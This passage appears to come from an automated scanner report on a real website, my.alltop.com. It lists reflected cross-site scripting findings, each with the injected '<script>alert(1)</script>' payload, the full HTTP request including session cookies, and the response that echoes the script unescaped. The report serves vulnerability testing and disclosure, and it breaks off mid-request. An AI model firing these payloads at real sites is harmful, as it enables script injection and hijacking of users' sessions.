<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t91c88"><script>alert(1)</script>f32a66e6908/%22ns=%22netsparker(0x00021A)" method="post" accept-charset="utf-8">
...[SNIP]...

1.217. http://my.alltop.com/alpha/t/%22ns=%22netsparker(0x00021A) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t/%22ns=%22netsparker(0x00021A)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddacd"><script>alert(1)</script>64ec3f7e85e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t/%22nsddacd"><script>alert(1)</script>64ec3f7e85e=%22netsparker(0x00021A) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:20 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:21 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:21 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t/%22nsddacd"><script>alert(1)</script>64ec3f7e85e=%22netsparker(0x00021A)" method="post" accept-charset="utf-8">
...[SNIP]...

1.218. http://my.alltop.com/alpha/t/%22ns=%22netsparker(0x00021A) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t/%22ns=%22netsparker(0x00021A)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0d9b"><script>alert(1)</script>e56999d2e31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t/%22ns=%22netsparker(0x00021A)?a0d9b"><script>alert(1)</script>e56999d2e31=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:18 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:18 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:18 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t/%22ns=%22netsparker(0x00021A)?a0d9b"><script>alert(1)</script>e56999d2e31=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.219. http://my.alltop.com/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 516f4"><script>alert(1)</script>8d2cefd4449 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t516f4"><script>alert(1)</script>8d2cefd4449/%2522ns%253D%2522netsparker%25280x000220%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:20 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:20 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:20 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t516f4"><script>alert(1)</script>8d2cefd4449/%2522ns%253D%2522netsparker%25280x000220%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.220. http://my.alltop.com/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33b70"><script>alert(1)</script>f37861f42e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)33b70"><script>alert(1)</script>f37861f42e5 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)33b70"><script>alert(1)</script>f37861f42e5" method="post" accept-charset="utf-8">
...[SNIP]...

1.221. http://my.alltop.com/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65f9b"><script>alert(1)</script>b50c05ba46f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)?65f9b"><script>alert(1)</script>b50c05ba46f=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:19 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:19 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:19 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)?65f9b"><script>alert(1)</script>b50c05ba46f=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.222. http://my.alltop.com/alpha/u [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/u

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2998"><script>alert(1)</script>3a21d4590a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/uf2998"><script>alert(1)</script>3a21d4590a1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:58 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:58 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/uf2998"><script>alert(1)</script>3a21d4590a1" method="post" accept-charset="utf-8">
...[SNIP]...

1.223. http://my.alltop.com/alpha/u [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/u

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c18bd"><script>alert(1)</script>63566903e73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/u?c18bd"><script>alert(1)</script>63566903e73=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:57 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/u?c18bd"><script>alert(1)</script>63566903e73=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.224. http://my.alltop.com/alpha/v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/v

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c754e"><script>alert(1)</script>01dd09cadc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/vc754e"><script>alert(1)</script>01dd09cadc3 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/vc754e"><script>alert(1)</script>01dd09cadc3" method="post" accept-charset="utf-8">
...[SNIP]...

1.225. http://my.alltop.com/alpha/v [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b10f3"><script>alert(1)</script>49c0e39747a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/v?b10f3"><script>alert(1)</script>49c0e39747a=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/v?b10f3"><script>alert(1)</script>49c0e39747a=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.226. http://my.alltop.com/alpha/w ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w

Issue detail

The value of the '"--></style></script><script>netsparker(0x00020A)</script> request parameter is copied into the HTML document as plain text between tags. The payload 36733<script>alert(1)</script>b1dcf723d06 was submitted in the '"--></style></script><script>netsparker(0x00020A)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w?'"--></style></script><script>netsparker(0x00020A)</script>36733<script>alert(1)</script>b1dcf723d06 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
